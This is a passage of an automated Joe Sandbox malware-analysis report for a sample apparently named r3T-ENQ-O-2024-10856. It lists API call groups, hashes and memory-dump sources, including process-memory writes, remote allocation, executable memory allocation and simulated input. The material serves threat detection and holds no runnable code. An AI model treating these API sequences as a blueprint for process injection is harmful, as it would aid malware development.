                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper$__itow__swprintf_memmove
                            • String ID: REMOVE$THIS
                            • API String ID: 2528338962-776492005
                            • Opcode ID: eb3371c1430ced7903b068a53fe69851a9f2e346da626eec0622726526e46345
                            • Instruction ID: 17cf753494b49fb3fa8b8a9cb73abb2ce353647ca635b206cae9d7d618465fb1
                            • Opcode Fuzzy Hash: eb3371c1430ced7903b068a53fe69851a9f2e346da626eec0622726526e46345
                            • Instruction Fuzzy Hash: F8417079A006199FCF15EF54CC85FAEB7F5BF48304F088069E856AB292DB34AD81CB50
                            APIs
                              • Part of subcall function 000C4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BC9FE,?,?,00000034,00000800,?,00000034), ref: 000C4D6B
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000BCFC9
                              • Part of subcall function 000C4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 000C4D36
                              • Part of subcall function 000C4C65: GetWindowThreadProcessId.USER32(?,?), ref: 000C4C90
                              • Part of subcall function 000C4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000BC9C2,00000034,?,?,00001004,00000000,00000000), ref: 000C4CA0
                              • Part of subcall function 000C4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000BC9C2,00000034,?,?,00001004,00000000,00000000), ref: 000C4CB6
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BD036
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BD083
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 2f4d03d6077fe4dbb26d6d23bd8d63baccbd81ec85ce83216bc0d87cc90b9e09
                            • Instruction ID: bda255b164ae2d254fdbbe15cc1648437f17fbd7cad5760ee5ae9c54d8208ee1
                            • Opcode Fuzzy Hash: 2f4d03d6077fe4dbb26d6d23bd8d63baccbd81ec85ce83216bc0d87cc90b9e09
                            • Instruction Fuzzy Hash: 03414C72900218AFDB10EFA4CC95FDEBBB8EF09700F104099FA45B7181DA716E45CB61
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0011DBF0,00000000,?,?,?,?), ref: 000EA4E6
                            • GetWindowLongW.USER32 ref: 000EA503
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000EA513
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: f213eca56a71fd8d4d105be95c5997e04ce4c99d96ac4f9669f0cf877c6fa664
                            • Instruction ID: 511d04349bbb7deb909d5bfd3e88380b3437c102f58dda0acb9fb644871df24d
                            • Opcode Fuzzy Hash: f213eca56a71fd8d4d105be95c5997e04ce4c99d96ac4f9669f0cf877c6fa664
                            • Instruction Fuzzy Hash: D931CE72200645AFDB219E38CC45BEA7BA9FB4A324F244725F875A21E1D770E8509B50
                            APIs
                            • _memset.LIBCMT ref: 000D57E7
                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000D581D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: ?K$|
                            • API String ID: 1413715105-163924116
                            • Opcode ID: 2377efb62ea8e1901cb65562353c3aea0deae4ab754b138e98e73763b6e09d07
                            • Instruction ID: 388996f790acea2b94cfff1dab39b7a0e16fd697cc004c5ca37707eac7f13055
                            • Opcode Fuzzy Hash: 2377efb62ea8e1901cb65562353c3aea0deae4ab754b138e98e73763b6e09d07
                            • Instruction Fuzzy Hash: E3311B71800219EFCF51AFA0DD95EEE7FB9FF19350F108026F815A6262DB319A46DB60
                            APIs
                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000EA74F
                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000EA75D
                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000EA764
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 4014797782-2298589950
                            • Opcode ID: 513c7f384c4c3bb21b08998ad25d0d9ad2cd28d347d1ea544f818335d0fb45a8
                            • Instruction ID: d53739a443dfc64245c7314b491dc8c56099d79f033230a0b46acf7eb6d616e4
                            • Opcode Fuzzy Hash: 513c7f384c4c3bb21b08998ad25d0d9ad2cd28d347d1ea544f818335d0fb45a8
                            • Instruction Fuzzy Hash: 7E2181B5604649AFEB10DF64DCC1EA737EDEB4A394B040059FA41AB262C771EC51CBA1
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000E983D
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000E984D
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000E9872
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: 2c2101e61c787265d8f22363f4bce2b463bb216f409b1f9bbfa65ef927490acd
                            • Instruction ID: b49d9f5de7b8fe90ec84c3492124c952030bb11504a25ca7ca493fe3b56d8223
                            • Opcode Fuzzy Hash: 2c2101e61c787265d8f22363f4bce2b463bb216f409b1f9bbfa65ef927490acd
                            • Instruction Fuzzy Hash: E521F632610158BFEF218F55DC85FFB3BAAEF8A754F018124F945AB1A0CA719C51CBA0
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000EA27B
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000EA290
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000EA29D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: c005fd7e4a50a41d3e60e7585448221855328cc6834e034c571b6d15fead8c2f
                            • Instruction ID: a2ef78e5bd7dfd5589fa4153eb3643f5394de845c8d9cbd8ce9d07ba8994959e
                            • Opcode Fuzzy Hash: c005fd7e4a50a41d3e60e7585448221855328cc6834e034c571b6d15fead8c2f
                            • Instruction Fuzzy Hash: CB11C171240248BFEF205F66CC46FAB3BA8EF8AB54F01411CFA45B6091D272A851DB60
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000A3028,?), ref: 000A2F79
                            • GetProcAddress.KERNEL32(00000000), ref: 000A2F80
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RoInitialize$combase.dll
                            • API String ID: 2574300362-340411864
                            • Opcode ID: c05cba929daa1bbcea1c50e7ce172442b17e2ffea747fa9d4a0782b8e23be0dd
                            • Instruction ID: 0e6c71a6dbc28a8f710a6b59887700e8a888b6b7369d19278ba62c12d39a33d3
                            • Opcode Fuzzy Hash: c05cba929daa1bbcea1c50e7ce172442b17e2ffea747fa9d4a0782b8e23be0dd
                            • Instruction Fuzzy Hash: 8CE01A74694300AFEB516FB6EC49B1536A5AB0AB06F400034B682D28F0CBF580D0DF04
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000A2F4E), ref: 000A304E
                            • GetProcAddress.KERNEL32(00000000), ref: 000A3055
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 2574300362-2819208100
                            • Opcode ID: 3d0951a02c60dea5662fd04618732c29e2a245e501b692947b7c6ac3ae072dd6
                            • Instruction ID: b3afb39b940475e79ccc6cbd01a8734050c579d899343de8a3cc3a2ef5937f41
                            • Opcode Fuzzy Hash: 3d0951a02c60dea5662fd04618732c29e2a245e501b692947b7c6ac3ae072dd6
                            • Instruction Fuzzy Hash: 8CE0EC74684300EBDB629FE2FD0DB053AA4BB09B06F110064F289D28F0CBF49580CB14
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: a4f90ad61d898c377342c30745ccd08bda1bb952d65e4916c6417283a9c3bb0e
                            • Instruction ID: 82c10c1166984b45a0c77a6d47e08e3ad4c6dbe6835a1f94d35cc36957ae2e50
                            • Opcode Fuzzy Hash: a4f90ad61d898c377342c30745ccd08bda1bb952d65e4916c6417283a9c3bb0e
                            • Instruction Fuzzy Hash: 87E0127180801CEBCB34D6D0DC069FE77BCAB04300F108492BA16A1400D735DB54BF13
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0009E69C,75920AE0,0009E5AC,0011DC28,?,?), ref: 0009E6B4
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0009E6C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: ec70690d2a19a7d6ee7503888f590b0dc3219a8ce116e898e01e2ab4af482712
                            • Instruction ID: 7eb4036e13caacb1797e8f8818813d2e869aac8b30cd5a0c1434ec5bccb101c9
                            • Opcode Fuzzy Hash: ec70690d2a19a7d6ee7503888f590b0dc3219a8ce116e898e01e2ab4af482712
                            • Instruction Fuzzy Hash: 83D0A9345003228FDB20AFB8F809602B7E8BB28301F20542AE5C5D2660DBB0C8C08A10
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0009E6D9,?,0009E55B,0011DC28,?,?), ref: 0009E6F1
                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0009E703
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsWow64Process$kernel32.dll
                            • API String ID: 2574300362-3024904723
                            • Opcode ID: 1c8b136658846b0c144fa0a52af42f7d84d9d7a61e9ee375193595490582926d
                            • Instruction ID: 19f0c6b79eae554e14a014df34eca83607a10d1d1a6eebe51680ad48032e20f0
                            • Opcode Fuzzy Hash: 1c8b136658846b0c144fa0a52af42f7d84d9d7a61e9ee375193595490582926d
                            • Instruction Fuzzy Hash: 33D0A9345043228FDB20BFA0F84D603BFE8BB08702F00442AE4D5D2650DBF0C8C08A10
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000DEBAF,?,000DEAAC), ref: 000DEBC7
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000DEBD9
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            • API String ID: 2574300362-1816364905
                            APIs
                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,000C135F,?,000C1440), ref: 000C1389
                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000C139B
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                            • API String ID: 2574300362-1071820185
                            APIs
                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000C1371,?,000C1519), ref: 000C13B4
                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000C13C6
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                            • API String ID: 2574300362-1587604923
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll,?,000E3AC2,?,000E3CF7), ref: 000E3ADA
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000E3AEC
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            APIs
                            • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,000D6AA6), ref: 0008AB2D
                            • _wcscmp.LIBCMT ref: 0008AB49
                            Similarity
                            • API ID: BuffCharUpper_wcscmp
                            • String ID:
                            • API String ID: 820872866-0
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 000E0D85
                            • CharLowerBuffW.USER32(?,?), ref: 000E0DC8
                              • Part of subcall function 000E0458: CharLowerBuffW.USER32(?,?,?,?), ref: 000E0478
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 000E0FB2
                            • _memmove.LIBCMT ref: 000E0FC2
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 000DAF56
                            • CoUninitialize.OLE32 ref: 000DAF61
                              • Part of subcall function 000C1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C10B8
                            • VariantInit.OLEAUT32(?), ref: 000DAF6C
                            • VariantClear.OLEAUT32(?), ref: 000DB23F
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            APIs
                            • _memmove.LIBCMT ref: 0008C419
                            • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,000C6653,?,?,00000000), ref: 0008C495
                            Similarity
                            • API ID: FileRead_memmove
                            • String ID:
                            • API String ID: 1325644223-0
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                            • String ID:
                            • API String ID: 3877424927-0
                            APIs
                            • GetWindowRect.USER32(00A27288,?), ref: 000EC354
                            • ScreenToClient.USER32(?,00000002), ref: 000EC384
                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 000EC3EA
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000BD258
                            • __itow.LIBCMT ref: 000BD292
                              • Part of subcall function 000BD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000BD549
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 000BD2FB
                            • __itow.LIBCMT ref: 000BD350
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000CEF32
                            • GetLastError.KERNEL32(?,00000000), ref: 000CEF58
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000CEF7D
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000CEFA9
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000EB3E1
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 000ED617
                            • GetWindowRect.USER32(?,?), ref: 000ED68D
                            • PtInRect.USER32(?,?,000EEB2C), ref: 000ED69D
                            • MessageBeep.USER32(00000000), ref: 000ED70E
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            APIs
                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 000C44EE
                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 000C450A
                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000C456A
                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 000C45C8
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000B4DE8
                            • __isleadbyte_l.LIBCMT ref: 000B4E16
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4E44
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4E7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 350de839e88b16d2f7e8d8eec78a4607d6558efa8a4c1d815f7f843c778f58c2
                            • Instruction ID: bcbd14844144595fc0eb88431741af30b42864a48467393de43be8b80d6d40d0
                            • Opcode Fuzzy Hash: 350de839e88b16d2f7e8d8eec78a4607d6558efa8a4c1d815f7f843c778f58c2
                            • Instruction Fuzzy Hash: A931AF31600256AFDF219F74C845BFA7BE6FF41314F158528E8718B1A2E730DA91DB90
                            APIs
                            • GetForegroundWindow.USER32 ref: 000E7AB6
                              • Part of subcall function 000C69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 000C69E3
                              • Part of subcall function 000C69C9: GetCurrentThreadId.KERNEL32 ref: 000C69EA
                              • Part of subcall function 000C69C9: AttachThreadInput.USER32(00000000,?,000C8127), ref: 000C69F1
                            • GetCaretPos.USER32(?), ref: 000E7AC7
                            • ClientToScreen.USER32(00000000,?), ref: 000E7B00
                            • GetForegroundWindow.USER32 ref: 000E7B06
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: 9af44667ff2f93f214a46a2df8efed749c567b0b941cdb3423524859d84b223a
                            • Instruction ID: 7e15fd548f7812c3b75907796758929371e3d01a534f102cd9a3c716f7a8f31b
                            • Opcode Fuzzy Hash: 9af44667ff2f93f214a46a2df8efed749c567b0b941cdb3423524859d84b223a
                            • Instruction Fuzzy Hash: 58312F71D00108AFCB10EFB5DC859EFBBFDEF58314B11806AE855E3212D6359E058BA0
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • GetCursorPos.USER32(?), ref: 000EEFE2
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FF3C3,?,?,?,?,?), ref: 000EEFF7
                            • GetCursorPos.USER32(?), ref: 000EF041
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FF3C3,?,?,?), ref: 000EF077
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID:
